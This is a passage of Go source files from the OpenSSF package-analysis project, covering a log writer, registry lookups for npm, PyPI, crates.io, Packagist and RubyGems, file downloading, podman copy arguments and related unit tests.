16 | func NewWriter(ctx context.Context, logger *slog.Logger, level slog.Level) io.WriteCloser {
17 | 	return &writer{
18 | 		ctx:    ctx,
19 | 		logger: logger,
20 | 		level:  level,
21 | 	}
22 | }
23 | 
24 | type writer struct {
25 | 	ctx    context.Context
26 | 	logger *slog.Logger
27 | 	level  slog.Level
28 | 	buffer bytes.Buffer
29 | }
30 | 
31 | // Write implements the io.Writer interface.
32 | //
33 | // Each line of bytes written appears as a log entry.
34 | func (w *writer) Write(p []byte) (int, error) {
35 | 	written := 0
36 | 	for {
37 | 		if len(p) == 0 {
38 | 			// p is now empty, so exit with the bytes written
39 | 			return written, nil
40 | 		}
41 | 		i := bytes.IndexByte(p, '\n')
42 | 		if i == -1 {
43 | 			// No more newlines to consume, so save the buffer and return
44 | 			n, err := w.buffer.Write(p)
45 | 			return written + n, err
46 | 		}
47 | 		// Append to the buffer.
48 | 		n, err := w.buffer.Write(p[:i])
49 | 		written += n
50 | 		if err != nil {
51 | 			return written, err
52 | 		}
53 | 		// Update the input and consume the newline
54 | 		p = p[i+1:]
55 | 		written += 1
56 | 		// Dump the buffer to the log
57 | 		line := w.buffer.Bytes()
58 | 		// Trim any trailing space - this won't include the newline
59 | 		line = bytes.TrimRightFunc(line, unicode.IsSpace)
60 | 		// Swallow any empty lines
61 | 		if len(line) > 0 {
62 | 			w.logger.Log(w.ctx, w.level, string(line))
63 | 		}
64 | 		// Reset the buffer.
65 | 		w.buffer.Reset()
66 | 	}
67 | }
68 | 
69 | // Close implements the io.Closer interface.
70 | //
71 | // Any unwritten bytes written as a final log entry.
72 | func (w *writer) Close() error {
73 | 	if w.buffer.Len() > 0 {
74 | 		w.logger.Log(w.ctx, w.level, w.buffer.String())
75 | 		w.buffer.Reset()
76 | 	}
77 | 	return nil
78 | }
79 | 


--------------------------------------------------------------------------------
/internal/notification/notification.go:
--------------------------------------------------------------------------------
 1 | package notification
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"encoding/json"
 6 | 	"fmt"
 7 | 
 8 | 	"gocloud.dev/pubsub"
 9 | 
10 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
11 | 	"github.com/ossf/package-analysis/pkg/api/notification"
12 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
13 | )
14 | 
15 | func PublishAnalysisCompletion(ctx context.Context, notificationTopic *pubsub.Topic, name, version string, ecosystem pkgecosystem.Ecosystem) error {
16 | 	k := analysisrun.Key{Name: name, Version: version, Ecosystem: ecosystem}
17 | 	notificationMsg, err := json.Marshal(notification.AnalysisRunComplete{Key: k})
18 | 	if err != nil {
19 | 		return fmt.Errorf("failed to encode completion notification: %w", err)
20 | 	}
21 | 	err = notificationTopic.Send(ctx, &pubsub.Message{
22 | 		Body:     notificationMsg,
23 | 		Metadata: nil,
24 | 	})
25 | 	if err != nil {
26 | 		return fmt.Errorf("failed to send completion notification: %w", err)
27 | 	}
28 | 	return nil
29 | }
30 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/crates.io.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"fmt"
 6 | 	"net/http"
 7 | 	"strings"
 8 | 
 9 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
10 | )
11 | 
12 | type cratesJSON struct {
13 | 	Versions []struct {
14 | 		Num string `json:"num"`
15 | 	} `json:"versions"`
16 | }
17 | 
18 | func getCratesLatest(pkg string) (string, error) {
19 | 	resp, err := http.Get(fmt.Sprintf("https://crates.io/api/v1/crates/%s/versions", pkg))
20 | 	if err != nil {
21 | 		return "", err
22 | 	}
23 | 	defer resp.Body.Close()
24 | 
25 | 	decoder := json.NewDecoder(resp.Body)
26 | 	var details cratesJSON
27 | 	err = decoder.Decode(&details)
28 | 	if err != nil {
29 | 		return "", err
30 | 	}
31 | 
32 | 	return details.Versions[0].Num, nil
33 | }
34 | 
35 | func getCratesArchiveURL(pkgName, version string) (string, error) {
36 | 	pkgURL := fmt.Sprintf("https://crates.io/api/v1/crates/%s/%s/download", pkgName, version)
37 | 	resp, err := http.Get(pkgURL)
38 | 	if err != nil {
39 | 		return "", err
40 | 	}
41 | 	defer resp.Body.Close()
42 | 
43 | 	return pkgURL, nil
44 | }
45 | 
46 | func getCratesArchiveFilename(pkgName, version, _ string) string {
47 | 	return strings.Join([]string{pkgName, "-", version, ".tar.gz"}, "")
48 | }
49 | 
50 | var cratesPkgManager = PkgManager{
51 | 	ecosystem:       pkgecosystem.CratesIO,
52 | 	latestVersion:   getCratesLatest,
53 | 	archiveURL:      getCratesArchiveURL,
54 | 	archiveFilename: getCratesArchiveFilename,
55 | }
56 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/download.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"io"
 6 | 	"net/http"
 7 | 	"os"
 8 | )
 9 | 
10 | /*
11 | downloadToPath creates (and/or truncates) a file at the given path, then writes
12 | contents of whatever is at the given URL to that given file using downloadToFile,
13 | and finally closes the file.
14 | 
15 | If any error occurs, the created file is removed.
16 | 
17 | Callers must ensure that path and url are nonempty, otherwise the function will panic.
18 | */
19 | func downloadToPath(path, url string) error {
20 | 	if path == "" {
21 | 		panic("path is empty")
22 | 	}
23 | 	if url == "" {
24 | 		panic("url is empty")
25 | 	}
26 | 
27 | 	file, err := os.Create(path)
28 | 	if err != nil {
29 | 		return err
30 | 	}
31 | 
32 | 	if downloadErr := downloadToFile(file, url); downloadErr != nil {
33 | 		// cleanup file
34 | 		if removeErr := os.Remove(path); removeErr != nil {
35 | 			return fmt.Errorf("%w\n%v", downloadErr, removeErr)
36 | 		}
37 | 		return downloadErr
38 | 	}
39 | 
40 | 	if closeErr := file.Close(); closeErr != nil {
41 | 		// cleanup file
42 | 		if removeErr := os.Remove(path); removeErr != nil {
43 | 			return fmt.Errorf("%w\n%v", closeErr, removeErr)
44 | 		}
45 | 		return closeErr
46 | 	}
47 | 
48 | 	return nil
49 | }
50 | 
51 | /*
52 | downloadToFile writes the contents of whatever is at the given URL to the
53 | given file, without opening or closing the file. If any errors occur while
54 | making the network request, then no file operations will be performed.
55 | 
56 | Callers must ensure that url is nonempty, otherwise the function will panic.
57 | */
58 | func downloadToFile(dest *os.File, url string) error {
59 | 	if url == "" {
60 | 		panic("url is empty")
61 | 	}
62 | 
63 | 	resp, err := http.Get(url)
64 | 	if err != nil {
65 | 		return err
66 | 	}
67 | 
68 | 	defer resp.Body.Close()
69 | 
70 | 	if resp.StatusCode != http.StatusOK {
71 | 		return fmt.Errorf("http status %s", resp.Status)
72 | 	}
73 | 
74 | 	if _, err := io.Copy(dest, resp.Body); err != nil {
75 | 		return err
76 | 	}
77 | 
78 | 	return nil
79 | }
80 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/npm.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"fmt"
 6 | 	"io"
 7 | 	"net/http"
 8 | 	"strings"
 9 | 
10 | 	"github.com/ossf/package-analysis/internal/utils"
11 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
12 | )
13 | 
14 | // npmPackageJSON represents relevant JSON data from the NPM registry response
15 | // when package information is requested.
16 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md
17 | type npmPackageJSON struct {
18 | 	DistTags struct {
19 | 		Latest string `json:"latest"`
20 | 	} `json:"dist-tags"`
21 | }
22 | 
23 | // npmVersionJSON represents relevant JSON data from the NPM registry response
24 | // when package version information is requested.
25 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md
26 | type npmVersionJSON struct {
27 | 	Dist struct {
28 | 		Tarball string `json:"tarball"`
29 | 	} `json:"dist"`
30 | }
31 | 
32 | func getNPMLatest(pkg string) (string, error) {
33 | 	resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s", pkg))
34 | 	if err != nil {
35 | 		return "", err
36 | 	}
37 | 	defer resp.Body.Close()
38 | 
39 | 	decoder := json.NewDecoder(resp.Body)
40 | 	var details npmPackageJSON
41 | 	err = decoder.Decode(&details)
42 | 	if err != nil {
43 | 		return "", err
44 | 	}
45 | 
46 | 	return details.DistTags.Latest, nil
47 | }
48 | 
49 | /*
50 | getNPMArchiveFilename generates a filename for a package archive to be downloaded from NPM.
51 | It is generated by replacing any '/' characters in the package name with '-' (ref [1]).
52 | Unlike in [1], the leading '@' is not stripped as '@' characters are allowed in filenames.
53 | The cleaned package name is then concatenated with "-", the version string and ".tgz".
54 | 
55 | [1] https://github.com/npm/cli/blob/8ecbcb9a54b95541f35ebce55d60e4a1feac82c6/lib/commands/pack.js#L64
56 | */
57 | func getNPMArchiveFilename(pkgName, version, _ string) string {
58 | 	cleanedName := strings.ReplaceAll(pkgName, "/", "-")
59 | 	return fmt.Sprintf("%s-%s.tgz", cleanedName, version)
60 | }
61 | 
62 | func getNPMArchiveURL(pkgName, version string) (string, error) {
63 | 	resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s/%s", pkgName, version))
64 | 	if err != nil {
65 | 		return "", err
66 | 	}
67 | 	defer resp.Body.Close()
68 | 
69 | 	responseBytes, err := io.ReadAll(resp.Body)
70 | 	if err != nil {
71 | 		return "", fmt.Errorf("error reading HTTP response: %w", err)
72 | 	}
73 | 
74 | 	responseString := string(responseBytes)
75 | 
76 | 	decoder := json.NewDecoder(strings.NewReader(responseString))
77 | 	var packageInfo npmVersionJSON
78 | 	if err := decoder.Decode(&packageInfo); err != nil {
79 | 		// invalid version, non-existent package, etc. Details in responseString
80 | 		return "", fmt.Errorf("%w. NPM response: %s", err, responseString)
81 | 	}
82 | 
83 | 	return packageInfo.Dist.Tarball, nil
84 | }
85 | 
86 | var npmPkgManager = PkgManager{
87 | 	ecosystem:       pkgecosystem.NPM,
88 | 	latestVersion:   getNPMLatest,
89 | 	archiveURL:      getNPMArchiveURL,
90 | 	archiveFilename: getNPMArchiveFilename,
91 | 	extractArchive:  utils.ExtractArchiveFile,
92 | }
93 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/package.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 5 | )
 6 | 
 7 | type Pkg struct {
 8 | 	name    string
 9 | 	version string
10 | 	manager *PkgManager
11 | 	local   string
12 | }
13 | 
14 | func (p *Pkg) Name() string {
15 | 	return p.name
16 | }
17 | 
18 | func (p *Pkg) Version() string {
19 | 	return p.version
20 | }
21 | 
22 | func (p *Pkg) Ecosystem() pkgecosystem.Ecosystem {
23 | 	return p.manager.ecosystem
24 | }
25 | 
26 | func (p *Pkg) EcosystemName() string {
27 | 	return string(p.Ecosystem())
28 | }
29 | 
30 | func (p *Pkg) IsLocal() bool {
31 | 	return p.local != ""
32 | }
33 | 
34 | func (p *Pkg) Manager() *PkgManager {
35 | 	return p.manager
36 | }
37 | 
38 | func (p *Pkg) LocalPath() string {
39 | 	return p.local
40 | }
41 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/packagist.go:
--------------------------------------------------------------------------------
  1 | package pkgmanager
  2 | 
  3 | import (
  4 | 	"encoding/json"
  5 | 	"fmt"
  6 | 	"net/http"
  7 | 	"strings"
  8 | 	"time"
  9 | 
 10 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 11 | )
 12 | 
 13 | type packagistDistJSON struct {
 14 | 	URL       string `json:"url"`
 15 | 	Type      string `json:"type"`
 16 | 	Shasum    string `json:"shasum,omitempty"`
 17 | 	Reference string `json:"reference"`
 18 | }
 19 | 
 20 | func (d *packagistDistJSON) UnmarshalJSON(data []byte) error {
 21 | 	switch string(data) {
 22 | 	case "null":
 23 | 		return nil
 24 | 	case `"__unset"`:
 25 | 		return nil
 26 | 	}
 27 | 	type raw packagistDistJSON
 28 | 	return json.Unmarshal(data, (*raw)(d))
 29 | }
 30 | 
 31 | type packagistJSON struct {
 32 | 	Packages map[string][]struct {
 33 | 		Version           string            `json:"version"`
 34 | 		VersionNormalized string            `json:"version_normalized"`
 35 | 		License           []string          `json:"license,omitempty"`
 36 | 		Time              time.Time         `json:"time"`
 37 | 		Name              string            `json:"name,omitempty"`
 38 | 		Dist              packagistDistJSON `json:"dist"`
 39 | 	} `json:"packages"`
 40 | }
 41 | 
 42 | func getPackagistLatest(pkg string) (string, error) {
 43 | 	resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkg))
 44 | 	if err != nil {
 45 | 		return "", err
 46 | 	}
 47 | 	defer resp.Body.Close()
 48 | 
 49 | 	decoder := json.NewDecoder(resp.Body)
 50 | 	var details packagistJSON
 51 | 	err = decoder.Decode(&details)
 52 | 	if err != nil {
 53 | 		return "", err
 54 | 	}
 55 | 
 56 | 	latestVersion := ""
 57 | 	var lastTime time.Time
 58 | 	for _, versions := range details.Packages {
 59 | 		for _, v := range versions {
 60 | 			if v.Time.Before(lastTime) {
 61 | 				continue
 62 | 			}
 63 | 			lastTime = v.Time
 64 | 			latestVersion = v.Version
 65 | 		}
 66 | 	}
 67 | 
 68 | 	return latestVersion, nil
 69 | }
 70 | 
 71 | func getPackagistArchiveURL(pkgName, version string) (string, error) {
 72 | 	resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkgName))
 73 | 	if err != nil {
 74 | 		return "", err
 75 | 	}
 76 | 	defer resp.Body.Close()
 77 | 
 78 | 	decoder := json.NewDecoder(resp.Body)
 79 | 	var details packagistJSON
 80 | 	err = decoder.Decode(&details)
 81 | 	if err != nil {
 82 | 		return "", err
 83 | 	}
 84 | 
 85 | 	for _, versions := range details.Packages {
 86 | 		for _, v := range versions {
 87 | 			if v.Version == version {
 88 | 				return v.Dist.URL, nil
 89 | 			}
 90 | 		}
 91 | 	}
 92 | 
 93 | 	return "", nil
 94 | }
 95 | 
 96 | func getPackagistArchiveFilename(pkgName, version, _ string) string {
 97 | 	pkg := strings.Split(pkgName, "/")
 98 | 	return strings.Join([]string{pkg[0], "-", pkg[1], "-", version, ".zip"}, "")
 99 | }
100 | 
101 | var packagistPkgManager = PkgManager{
102 | 	ecosystem:       pkgecosystem.Packagist,
103 | 	latestVersion:   getPackagistLatest,
104 | 	archiveURL:      getPackagistArchiveURL,
105 | 	archiveFilename: getPackagistArchiveFilename,
106 | }
107 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/pypi.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"fmt"
 6 | 	"io"
 7 | 	"net/http"
 8 | 	"strings"
 9 | 
10 | 	"github.com/ossf/package-analysis/internal/utils"
11 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
12 | )
13 | 
14 | // pypiPackageInfoJSON represents relevant JSON data from the PyPI web API response
15 | // when package information is requested. The differences in response format between
16 | // (valid) requests made with a specific package version and with no package version
17 | // are not significant in our case.
18 | // (In particular, if the request contains a valid version, Urls contains a single entry
19 | // holding information for that package version. If the version is unspecified, Urls contains
20 | // an entry corresponding to each version of the package available on PyPI.)
21 | // See https://warehouse.pypa.io/api-reference/json.html and https://peps.python.org/pep-0691
22 | type pypiPackageInfoJSON struct {
23 | 	Info struct {
24 | 		Version string `json:"version"`
25 | 	} `json:"info"`
26 | 	URLs []struct {
27 | 		PackageType string `json:"packagetype"`
28 | 		URL         string `json:"url"`
29 | 	} `json:"urls"`
30 | }
31 | 
32 | func getPyPILatest(pkg string) (string, error) {
33 | 	resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/json", pkg))
34 | 	if err != nil {
35 | 		return "", err
36 | 	}
37 | 	defer resp.Body.Close()
38 | 
39 | 	decoder := json.NewDecoder(resp.Body)
40 | 	var details pypiPackageInfoJSON
41 | 	err = decoder.Decode(&details)
42 | 	if err != nil {
43 | 		return "", err
44 | 	}
45 | 
46 | 	return details.Info.Version, nil
47 | }
48 | 
49 | func getPyPIArchiveURL(pkgName, version string) (string, error) {
50 | 	resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/%s/json", pkgName, version))
51 | 	if err != nil {
52 | 		return "", err
53 | 	}
54 | 	defer resp.Body.Close()
55 | 
56 | 	responseBytes, err := io.ReadAll(resp.Body)
57 | 	if err != nil {
58 | 		return "", fmt.Errorf("error reading HTTP response: %w", err)
59 | 	}
60 | 
61 | 	responseString := string(responseBytes)
62 | 	decoder := json.NewDecoder(strings.NewReader(responseString))
63 | 	var packageInfo pypiPackageInfoJSON
64 | 	err = decoder.Decode(&packageInfo)
65 | 	if err != nil {
66 | 		// invalid version, non-existent package, etc. Details in responseString
67 | 		return "", fmt.Errorf("%w. PyPI response: %s", err, responseString)
68 | 	}
69 | 
70 | 	// Need to find the archive with PackageType == "sdist"
71 | 	for _, url := range packageInfo.URLs {
72 | 		if url.PackageType == "sdist" {
73 | 			return url.URL, nil
74 | 		}
75 | 	}
76 | 
77 | 	// Return an empty string and no error if we can't find an archive URL.
78 | 	return "", nil
79 | }
80 | 
81 | var pypiPkgManager = PkgManager{
82 | 	ecosystem:       pkgecosystem.PyPI,
83 | 	latestVersion:   getPyPILatest,
84 | 	archiveURL:      getPyPIArchiveURL,
85 | 	archiveFilename: defaultArchiveFilename,
86 | 	extractArchive:  utils.ExtractArchiveFile,
87 | }
88 | 


--------------------------------------------------------------------------------
/internal/pkgmanager/rubygems.go:
--------------------------------------------------------------------------------
 1 | package pkgmanager
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"fmt"
 6 | 	"net/http"
 7 | 
 8 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 9 | )
10 | 
11 | type rubygemsJSON struct {
12 | 	Version string `json:"version"`
13 | }
14 | 
15 | func getRubyGemsLatest(pkg string) (string, error) {
16 | 	resp, err := http.Get(fmt.Sprintf("https://rubygems.org/api/v1/gems/%s.json", pkg))
17 | 	if err != nil {
18 | 		return "", err
19 | 	}
20 | 	defer resp.Body.Close()
21 | 
22 | 	decoder := json.NewDecoder(resp.Body)
23 | 	var details rubygemsJSON
24 | 	err = decoder.Decode(&details)
25 | 	if err != nil {
26 | 		return "", err
27 | 	}
28 | 
29 | 	return details.Version, nil
30 | }
31 | 
32 | func getRubyGemsArchiveURL(pkgName, version string) (string, error) {
33 | 	pkgURL := fmt.Sprintf("https://rubygems.org/gems/%v-%v.gem", pkgName, version)
34 | 	resp, err := http.Get(pkgURL)
35 | 	if err != nil {
36 | 		return "", err
37 | 	}
38 | 	defer resp.Body.Close()
39 | 
40 | 	return pkgURL, nil
41 | }
42 | 
43 | var rubygemsPkgManager = PkgManager{
44 | 	ecosystem:       pkgecosystem.RubyGems,
45 | 	latestVersion:   getRubyGemsLatest,
46 | 	archiveURL:      getRubyGemsArchiveURL,
47 | 	archiveFilename: defaultArchiveFilename,
48 | }
49 | 


--------------------------------------------------------------------------------
/internal/resultstore/result.go:
--------------------------------------------------------------------------------
 1 | package resultstore
 2 | 
 3 | import "github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 4 | 
 5 | // Pkg describes the various package details used to populate the package part
 6 | // of the analysis results.
 7 | type Pkg interface {
 8 | 	Ecosystem() pkgecosystem.Ecosystem
 9 | 	EcosystemName() string
10 | 	Name() string
11 | 	Version() string
12 | }
13 | 


--------------------------------------------------------------------------------
/internal/resultstore/resultstore_test.go:
--------------------------------------------------------------------------------
 1 | package resultstore
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
 6 | 	"os"
 7 | 	"path"
 8 | 	"path/filepath"
 9 | 	"testing"
10 | )
11 | 
12 | func TestFileBucket(t *testing.T) {
13 | 	tmpDir := t.TempDir()
14 | 
15 | 	testBucketURL := "file://" + tmpDir
16 | 	fmt.Println(testBucketURL)
17 | 
18 | 	testKeys := []string{
19 | 		"test1.txt",
20 | 		path.Join("testdir", "test2.txt"), // use path not filepath since it's a URL
21 | 	}
22 | 
23 | 	ctx := context.Background()
24 | 
25 | 	rs := New(testBucketURL)
26 | 	if rs == nil {
27 | 		t.Errorf("failed to open create resultstore with URL %s (invalid url)", testBucketURL)
28 | 	}
29 | 
30 | 	bucket, err := rs.openBucket(ctx)
31 | 	if err != nil {
32 | 		t.Errorf("failed to open bucket: %v", err)
33 | 	}
34 | 
35 | 	for _, key := range testKeys {
36 | 		t.Run(key, func(t *testing.T) {
37 | 			writer, err := bucket.NewWriter(ctx, key, nil)
38 | 			if err != nil {
39 | 				t.Errorf("failed to create writer: %v", err)
40 | 			}
41 | 
42 | 			if _, err := writer.Write([]byte("test bytes")); err != nil {
43 | 				t.Errorf("failed to write to file: %v", err)
44 | 			}
45 | 
46 | 			if err := writer.Close(); err != nil {
47 | 				t.Errorf("failed to close writer: %v", err)
48 | 			}
49 | 
50 | 			if _, err := os.Stat(filepath.Join(tmpDir, key)); err != nil {
51 | 				t.Errorf("failed to stat file: %v", err)
52 | 			}
53 | 
54 | 		})
55 | 	}
56 | 
57 | 	if err := bucket.Close(); err != nil {
58 | 		t.Errorf("failed to close bucket: %v", err)
59 | 	}
60 | }
61 | 


--------------------------------------------------------------------------------
/internal/sandbox/copy_args.go:
--------------------------------------------------------------------------------
 1 | package sandbox
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"strings"
 6 | )
 7 | 
 8 | // copySpec specifies the source and destination of a copy operation.
 9 | // The copy may be made from the host into the sandbox or vice versa.
10 | // See https://docs.podman.io/en/latest/markdown/podman-cp.1.html for
11 | // semantics of src and dest paths.
12 | // srcInContainer and destInContainer specify whether the copy source
13 | // and destination are respectively in the host (false) or container (true)
14 | type copySpec struct {
15 | 	src             string
16 | 	dest            string
17 | 	srcInContainer  bool
18 | 	destInContainer bool
19 | 	containerId     string
20 | }
21 | 
22 | func (c copySpec) Args() []string {
23 | 	copySrc := c.src
24 | 	if c.srcInContainer {
25 | 		copySrc = fmt.Sprintf("%s:%s", c.containerId, c.src)
26 | 	}
27 | 
28 | 	copyDest := c.dest
29 | 	if c.destInContainer {
30 | 		copyDest = fmt.Sprintf("%s:%s", c.containerId, c.dest)
31 | 	}
32 | 
33 | 	return []string{"cp", copySrc, copyDest}
34 | }
35 | 
36 | func (c copySpec) String() string {
37 | 	return strings.Join(c.Args(), " ")
38 | }
39 | 
40 | // hostToContainerCopyCmd generates the arguments to podman
41 | // that copy a file from the host to the container.
42 | func hostToContainerCopyCmd(hostPath, containerPath, containerId string) copySpec {
43 | 	return copySpec{hostPath, containerPath, false, true, containerId}
44 | }
45 | 
46 | // hostToContainerCopyCmd generates the arguments to podman
47 | // that copy a file from the container to host.
48 | func containerToHostCopyCmd(hostPath, containerPath, containerId string) copySpec {
49 | 	return copySpec{containerPath, hostPath, true, false, containerId}
50 | }
51 | 


--------------------------------------------------------------------------------
/internal/sandbox/copy_args_test.go:
--------------------------------------------------------------------------------
 1 | package sandbox
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | type copyCmdTestCase struct {
 9 | 	name          string
10 | 	hostPath      string
11 | 	containerPath string
12 | 	containerId   string
13 | 	want          []string
14 | }
15 | 
16 | func Test_containerToHostCopyCmdArgs(t *testing.T) {
17 | 	tests := []copyCmdTestCase{
18 | 		{
19 | 			name:          "simple relative path",
20 | 			hostPath:      "path/in/host",
21 | 			containerPath: "path/in/container",
22 | 			containerId:   "12345",
23 | 			want:          []string{"cp", "12345:path/in/container", "path/in/host"},
24 | 		},
25 | 		{
26 | 			name:          "simple absolute path",
27 | 			hostPath:      "/dest/path/in/host",
28 | 			containerPath: "/src/path/in/container",
29 | 			containerId:   "abcde",
30 | 			want:          []string{"cp", "abcde:/src/path/in/container", "/dest/path/in/host"},
31 | 		},
32 | 	}
33 | 	for _, tt := range tests {
34 | 		t.Run(tt.name, func(t *testing.T) {
35 | 			got := containerToHostCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args()
36 | 			if !reflect.DeepEqual(got, tt.want) {
37 | 				t.Errorf("containerToHostCopyCmd() = %v, want %v", got, tt.want)
38 | 			}
39 | 		})
40 | 	}
41 | }
42 | 
43 | func Test_hostToContainerCopyCmdArgs(t *testing.T) {
44 | 	tests := []copyCmdTestCase{
45 | 		{
46 | 			name:          "simple relative path",
47 | 			hostPath:      "/src",
48 | 			containerPath: "/dest",
49 | 			containerId:   "12345",
50 | 			want:          []string{"cp", "/src", "12345:/dest"},
51 | 		},
52 | 		{
53 | 			name:          "simple absolute path",
54 | 			hostPath:      "/src/path/in/host",
55 | 			containerPath: "/dest/path/in/container",
56 | 			containerId:   "abcde",
57 | 			want:          []string{"cp", "/src/path/in/host", "abcde:/dest/path/in/container"},
58 | 		},
59 | 	}
60 | 	for _, tt := range tests {
61 | 		t.Run(tt.name, func(t *testing.T) {
62 | 			got := hostToContainerCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args()
63 | 			if !reflect.DeepEqual(got, tt.want) {
64 | 				t.Errorf("hostToContainerCopyCmd() = %v, want %v", got, tt.want)
65 | 			}
66 | 		})
67 | 	}
68 | }
69 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/basicdata/basic_data_test.go:
--------------------------------------------------------------------------------
 1 | package basicdata
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"os"
 6 | 	"path/filepath"
 7 | 	"reflect"
 8 | 	"testing"
 9 | 
10 | 	"github.com/ossf/package-analysis/internal/utils"
11 | 	"github.com/ossf/package-analysis/pkg/valuecounts"
12 | )
13 | 
14 | type testFile struct {
15 | 	filename     string
16 | 	contents     []byte
17 | 	contentsHash string
18 | 	fileType     string
19 | 	lineLengths  valuecounts.ValueCounts
20 | }
21 | 
22 | var testFiles = []testFile{
23 | 	{
24 | 		filename:     "test1.txt",
25 | 		contents:     []byte("hello test 1!\n"),
26 | 		contentsHash: "bd96959573979235b87180b0b7513c7f1d5cbf046b263f366f2f10fe1b966494",
27 | 		fileType:     "ASCII text",
28 | 		lineLengths:  valuecounts.Count([]int{13}),
29 | 	},
30 | 	{
31 | 		filename:     "test2.txt",
32 | 		contents:     []byte("#! /bin/bash\necho 'Hello test 2'\n"),
33 | 		contentsHash: "6179db3c673ceddcdbd384116ae4d301d64e65fc2686db9ba64945677a5a893c",
34 | 		fileType:     "Bourne-Again shell script, ASCII text executable",
35 | 		lineLengths:  valuecounts.Count([]int{12, 19}),
36 | 	},
37 | }
38 | 
39 | func TestGetBasicData(t *testing.T) {
40 | 	tests := []struct {
41 | 		name    string
42 | 		files   []testFile
43 | 		wantErr bool
44 | 	}{
45 | 		{
46 | 			name:    "test no files",
47 | 			files:   nil,
48 | 			wantErr: false,
49 | 		},
50 | 		{
51 | 			name:    "test one file",
52 | 			files:   []testFile{testFiles[0]},
53 | 			wantErr: false,
54 | 		},
55 | 		{
56 | 			name:    "test two files",
57 | 			files:   []testFile{testFiles[0], testFiles[1]},
58 | 			wantErr: false,
59 | 		},
60 | 	}
61 | 	for _, tt := range tests {
62 | 		t.Run(tt.name, func(t *testing.T) {
63 | 			testDir := t.TempDir()
64 | 			paths := utils.Transform(tt.files, func(f testFile) string {
65 | 				return filepath.Join(testDir, f.filename)
66 | 			})
67 | 
68 | 			for i := range tt.files {
69 | 				if err := os.WriteFile(paths[i], tt.files[i].contents, 0o666); err != nil {
70 | 					t.Fatalf("failed to write test file %d: %v", i, err)
71 | 				}
72 | 			}
73 | 
74 | 			got, err := Analyze(context.Background(), paths)
75 | 			if (err != nil) != tt.wantErr {
76 | 				t.Errorf("detectFileTypes() error = %v, wantErr %v", err, tt.wantErr)
77 | 				return
78 | 			}
79 | 
80 | 			wantData := utils.Transform(tt.files, func(f testFile) FileData {
81 | 				return FileData{
82 | 					DetectedType: f.fileType,
83 | 					Size:         int64(len(f.contents)),
84 | 					SHA256:       f.contentsHash,
85 | 					LineLengths:  f.lineLengths,
86 | 				}
87 | 			})
88 | 
89 | 			if !reflect.DeepEqual(got, wantData) {
90 | 				t.Errorf("TestGetBasicData() data mismatch:\n"+
91 | 					"== got == \n%v\n== want ==\n%v", got, wantData)
92 | 			}
93 | 		})
94 | 	}
95 | }
96 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/basicdata/describe_files.go:
--------------------------------------------------------------------------------
 1 | package basicdata
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
 6 | 	"log/slog"
 7 | 	"os"
 8 | 	"os/exec"
 9 | 	"strings"
10 | 
11 | 	"github.com/ossf/package-analysis/internal/staticanalysis/externalcmd"
12 | )
13 | 
14 | // fileCmdInputArgs describes how to pass file arguments to the `file` command.
15 | type fileCmdArgsHandler struct{}
16 | 
17 | func (h fileCmdArgsHandler) SingleFileArg(filePath string) []string {
18 | 	return []string{filePath}
19 | }
20 | 
21 | func (h fileCmdArgsHandler) FileListArg(fileListPath string) []string {
22 | 	return []string{"--files-from", fileListPath}
23 | }
24 | 
25 | func (h fileCmdArgsHandler) ReadStdinArg() []string {
26 | 	// reads file list from standard input
27 | 	return h.FileListArg("-")
28 | }
29 | 
30 | func detectFileTypes(ctx context.Context, paths []string) ([]string, error) {
31 | 	workingDir, err := os.MkdirTemp("", "package-analysis-basic-data-*")
32 | 	if err != nil {
33 | 		return nil, fmt.Errorf("error creating temp file: %w", err)
34 | 	}
35 | 	defer func() {
36 | 		if err := os.RemoveAll(workingDir); err != nil {
37 | 			slog.ErrorContext(ctx, "could not remove working directory", "path", workingDir, "error", err)
38 | 		}
39 | 	}()
40 | 
41 | 	cmd := exec.CommandContext(ctx, "file", "--brief")
42 | 	input := externalcmd.MultipleFileInput(paths)
43 | 
